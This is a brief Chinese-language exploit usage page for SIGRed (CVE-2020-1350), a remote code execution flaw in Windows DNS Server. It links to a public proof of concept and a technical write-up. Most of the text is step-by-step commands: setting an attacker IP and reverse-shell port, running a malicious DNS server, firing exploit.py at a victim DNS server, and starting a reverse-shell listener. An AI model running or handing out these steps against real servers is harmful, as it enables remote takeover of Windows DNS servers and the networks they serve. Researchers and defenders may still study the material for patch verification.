# DNS Server远程代码执行漏洞(CVE-2020-1350)

关于此漏洞的详细信息：https://www.graplsecurity.com/post/anatomy-of-an-exploit-rce-with-cve-2020-1350-sigred

漏洞利用：

```bash
sudo python3 configure.py -ip IP_ATTACKER -p PORT_REVERSE_SHELL -hp PORT_APACHE_SERVER (default 80)
sudo python3 evildns.py
```

需要sudo监听UDP和TCP端口53

然后运行：

```bash
python3 exploit.py -ip WINDNS_VICTIM_IP -d EVIL_DOMAIN
```

设置反弹shell的监听：

```bash
python3 reverse_shell/server.py -p PORT_REVERSE_SHELL
```

poc：https://github.com/chompie1337/SIGRed_RCE_PoC

ref：

* https://www.graplsecurity.com/po ... ve-2020-1350-sigred
* https://github.com/chompie1337/SIGRed_RCE_PoC
* https://nvd.nist.gov/vuln/detail/CVE-2020-1350